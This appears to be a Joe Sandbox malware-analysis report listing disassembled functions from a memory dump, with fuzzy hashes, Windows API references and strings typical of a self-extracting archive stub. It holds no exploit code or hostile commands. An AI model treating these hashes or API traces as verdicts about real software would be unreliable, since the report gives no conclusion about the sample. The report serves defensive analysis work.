Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cdf1e483d80e8f7f718a73129c6964be52e9647d7628bf0892bb62da8054e69
Instruction ID: e63063db3da6cc0b46d332e89f6e7d38fbf5936b342dfb87937630a6827fb1f8
Opcode Fuzzy Hash: 3cdf1e483d80e8f7f718a73129c6964be52e9647d7628bf0892bb62da8054e69
Instruction Fuzzy Hash: DAE16DB95083948FD315CF19D98046BBFF0AF9A300F49095EF9C497352D236EA19DB92

Function 01014088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction ID: 0e71baa4b98d31938451221d1f045e8a8be1f53dc6e5eb7497dead484dbbf9dc
Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction Fuzzy Hash: CD9143B030034A8BEB25EE68D894BFE77D5EBA0304F54092DEAD6C72C5DB789585C351

Function 010143BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 17ebbe5ab46b511d7d505b565235103b9e696ffff0de12b763c1e5597a2c27b6
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 1E815C713443468BEB25DE68C8D0BFD77D4AB94308F04092DEAC6CB69ADF7885858752

Function 010251C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64c6c010835b2e237667a447b11e2f87ae8f8ab2989e7b45553c4c40e93a0b13
Instruction ID: 2a4a1d2b4c88d1a333736881aae1f1735f2a194d99cc3c33aeb41a62722d7bb2
Opcode Fuzzy Hash: 64c6c010835b2e237667a447b11e2f87ae8f8ab2989e7b45553c4c40e93a0b13
Instruction Fuzzy Hash: 0561A83160073966EBB89A6C6C947FE63D4EB13210F04959AFAC3DF2C1D691D84A861D

Function 01024F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction ID: 340b8eb8a6e8c06bbba6cc4c00c2b3dd21337ad6c37c58b72ddc8bd1a5eedc0b
Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction Fuzzy Hash: 26518860300B3557EFB9456C8C99FFF2BC99B52200F58089AEBC3CB692D609E545C39E

Function 0100EFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60a80ef402ff4950a71dba13457ceaa2be071315d8b5682f293dee39f5eba645
Instruction ID: 287d4bb29ec43ab5b54c119976bc638c3fb83d547fa010fd75acc0070a46dedc
Opcode Fuzzy Hash: 60a80ef402ff4950a71dba13457ceaa2be071315d8b5682f293dee39f5eba645
Instruction Fuzzy Hash: C851C4315093964FE723CF28C5844EEBFE0AE9A614F490999F4D95B283C221D68ADB52

Function 010100B7 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4881ea7f0f8c1c116e95e3405e1918a212335350a46169fc05905e0aece857ae
Instruction ID: 304fd4cdbcefe9943b6cee2b0913a5a491fa50279448c3f6362cff1b06abbfaf
Opcode Fuzzy Hash: 4881ea7f0f8c1c116e95e3405e1918a212335350a46169fc05905e0aece857ae
Instruction Fuzzy Hash: BB51DEB1A087159FC748CF19D48055AF7E1FB88324F058A2EF899E3340D735E999CB9A

Function 01013E0B Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction ID: b87aa642bf52f93208661ed39b590bc995cefb1abea06ad5cf7fd95ba50059f3
Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
Instruction Fuzzy Hash: 2831E4B17147468FDB55DF28C8502AABBE0FB95314F44452DE4C5DB341CB38E90ACB91

Function 0100E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0100E30E

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

Part of subcall function 01011DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,01041030,00000200,0100D928,00000000,?,00000050,01041030), ref: 01011DC4

_strlen.LIBCMT ref: 0100E32F
SetDlgItemTextW.USER32(?,0103E274,?), ref: 0100E38F
GetWindowRect.USER32(?,?), ref: 0100E3C9
GetClientRect.USER32(?,?), ref: 0100E3D5
GetWindowLongW.USER32(?,000000F0), ref: 0100E475
GetWindowRect.USER32(?,?), ref: 0100E4A2
SetWindowTextW.USER32(?,?), ref: 0100E4DB
GetSystemMetrics.USER32(00000008), ref: 0100E4E3
GetWindow.USER32(?,00000005), ref: 0100E4EE
GetWindowRect.USER32(00000000,?), ref: 0100E51B
GetWindow.USER32(00000000,00000002), ref: 0100E58D

Strings

d, xrefs: 0100E3F5
$%s:, xrefs: 0100E302
CAPTION, xrefs: 0100E4BD

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 5e9b1f5948d5ede331eca1620290bc120bc7f421ca398b697d1f1cd94713650f
Instruction ID: 77572dba87375e63bc7a4dfe3971a20d318bad5496172d233b9976a4215ce5b3
Opcode Fuzzy Hash: 5e9b1f5948d5ede331eca1620290bc120bc7f421ca398b697d1f1cd94713650f
Instruction Fuzzy Hash: C8819371504301AFE711DFA8CD88A6BBBE9FBC8714F04491DFAC4AB291D675E8058B52

Function 0102CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0102CB66

Part of subcall function 0102C701: _free.LIBCMT ref: 0102C71E
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C730
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C742
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C754
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C766
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C778
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C78A
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C79C
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7AE
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7C0
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7D2
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7E4
Part of subcall function 0102C701: _free.LIBCMT ref: 0102C7F6

_free.LIBCMT ref: 0102CB5B

Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4

_free.LIBCMT ref: 0102CB7D
_free.LIBCMT ref: 0102CB92
_free.LIBCMT ref: 0102CB9D
_free.LIBCMT ref: 0102CBBF
_free.LIBCMT ref: 0102CBD2
_free.LIBCMT ref: 0102CBE0
_free.LIBCMT ref: 0102CBEB
_free.LIBCMT ref: 0102CC23
_free.LIBCMT ref: 0102CC2A
_free.LIBCMT ref: 0102CC47
_free.LIBCMT ref: 0102CC5F

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9ad5ac4629ba0624ddac6e5df04943e9ff02073a2ce0fe188b310cae6791bea8
Instruction ID: 92a1fe252f5fb22641233d3ea0ec513d1b79043f541a32e0cbcd75d5f46099e7
Opcode Fuzzy Hash: 9ad5ac4629ba0624ddac6e5df04943e9ff02073a2ce0fe188b310cae6791bea8
Instruction Fuzzy Hash: F7315C316003269FFB62AA3DDA44B9A77E9AF10210F2088AAE5C8D7161DF31E844DB10

Function 01019711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 01019736
_wcslen.LIBCMT ref: 010197D6
GlobalAlloc.KERNEL32(00000040,?), ref: 010197E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 01019806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0101982D

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 01019760
utf-8"></head>, xrefs: 0101976B
</html>, xrefs: 010197B7
<html>, xrefs: 01019755, 0101978E

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: e0efe7301e4b73f9d288078a90531bf66969b580ce9f42389b7ff44089e771e0
Instruction ID: 1e808a2ef87b8351e980c866ebd2a9022a9b0e351365c36056730496eca19ff7
Opcode Fuzzy Hash: e0efe7301e4b73f9d288078a90531bf66969b580ce9f42389b7ff44089e771e0
Instruction Fuzzy Hash: 4B316A32504312BAE725AF349C45FAF7B9CEFA5314F14011DF9C19A1C5EB6CD90983A6

Function 0101D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0101D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 0101D6ED

Part of subcall function 01011FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0100C116,00000000,.exe,?,?,00000800,?,?,?,01018E3C), ref: 01011FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 0101D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0101D720
GetObjectW.GDI32(00000000,00000018,?), ref: 0101D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0101D75D
DeleteObject.GDI32(00000000), ref: 0101D764
GetWindow.USER32(00000000,00000002), ref: 0101D76D

Strings

STATIC, xrefs: 0101D6F3

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 7b211ac1ec016f48996b362fb73a61cf88782a7a2351b924daa4c47dd72f0b4b
Instruction ID: 25dfd916c8ba7c0ab13d058deccb356f20d20d70cb3819897a4b6106aaf2844e
Opcode Fuzzy Hash: 7b211ac1ec016f48996b362fb73a61cf88782a7a2351b924daa4c47dd72f0b4b
Instruction Fuzzy Hash: B8112432601791BBF2316AB49C4DFAF7AACBF54711F004510FAC5AA09DEB6DCA0947E4

Function 010296F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01029705

Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4

_free.LIBCMT ref: 01029711
_free.LIBCMT ref: 0102971C
_free.LIBCMT ref: 01029727
_free.LIBCMT ref: 01029732
_free.LIBCMT ref: 0102973D
_free.LIBCMT ref: 01029748
_free.LIBCMT ref: 01029753
_free.LIBCMT ref: 0102975E
_free.LIBCMT ref: 0102976C

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c43e232320fa49392d8cc6717b0b964e5f0fa1288f34522141f2b73dbaf3b9d3
Instruction ID: a807f113391efa2cf6189ab72bf95ccdf6b102d967594a14376634fc56722bdd
Opcode Fuzzy Hash: c43e232320fa49392d8cc6717b0b964e5f0fa1288f34522141f2b73dbaf3b9d3
Instruction Fuzzy Hash: 5111B67A51012ABFDB01FF54C840CDD3BB5EF24250B5199A2FA488F231DA32DA54DB84

Function 01022E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 01022F50
___TypeMatch.LIBVCRUNTIME ref: 0102305E
_UnwindNestedFrames.LIBCMT ref: 010231B0
CallUnexpected.LIBVCRUNTIME ref: 010231CB
_abort.LIBCMT ref: 010231D0

Strings

csm, xrefs: 01022EDB
csm, xrefs: 01022E6E
csm, xrefs: 01022F87

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 37ff6d6e9d14b98615f68c4780c8c35fd2040b24c6d3f7f7802e83d4d219e026
Instruction ID: 3009a68ba0c10372f4f5e81e888928a06bdf6dfffadf82987a72d16c11bf00eb
Opcode Fuzzy Hash: 37ff6d6e9d14b98615f68c4780c8c35fd2040b24c6d3f7f7802e83d4d219e026
Instruction Fuzzy Hash: 12B19F3180022ADFCF65DFA8C8809AEBBB5FF18310F1441A9E9816F216D739DA51CF91

Function 01006FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01006FAA
_wcslen.LIBCMT ref: 01007013
_wcslen.LIBCMT ref: 01007084

Part of subcall function 01007A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007AAB
Part of subcall function 01007A9C: GetLastError.KERNEL32 ref: 01007AF1
Part of subcall function 01007A9C: CloseHandle.KERNEL32(?), ref: 01007B00

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 01006FCC
SeRestorePrivilege, xrefs: 01006FC2
UNC\, xrefs: 01007051
\??\, xrefs: 0100702B

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 213f1ec5c353957f1e24182f162d206d5cf168ed8176241598e85ff1c26ad575
Instruction ID: ca10db17fc503464c14c077f19f12ba8a28207a9924c6d18ed898d4d9aa9e784
Opcode Fuzzy Hash: 213f1ec5c353957f1e24182f162d206d5cf168ed8176241598e85ff1c26ad575
Instruction Fuzzy Hash: 7B41C0B1E04745AAFB22E7789C81FEE77ACAF54300F004495FAC5A71C1D679B6888660

Function 0101B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

EndDialog.USER32(?,00000001), ref: 0101B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 0101B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0101B650
SetWindowTextW.USER32(?,?), ref: 0101B661
GetDlgItem.USER32(?,00000065), ref: 0101B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0101B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0101B694

Strings

LICENSEDLG, xrefs: 0101B5D4

Memory Dump Source

Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 8548c82282c6687606edc22c343d363b41ca74d2928992214359066839cee201
Instruction ID: 34be27a9a6e3a3ee10a83ec1f57ab02219d233977af3c547384fd8adb991aca8
Opcode Fuzzy Hash: 8548c82282c6687606edc22c343d363b41ca74d2928992214359066839cee201
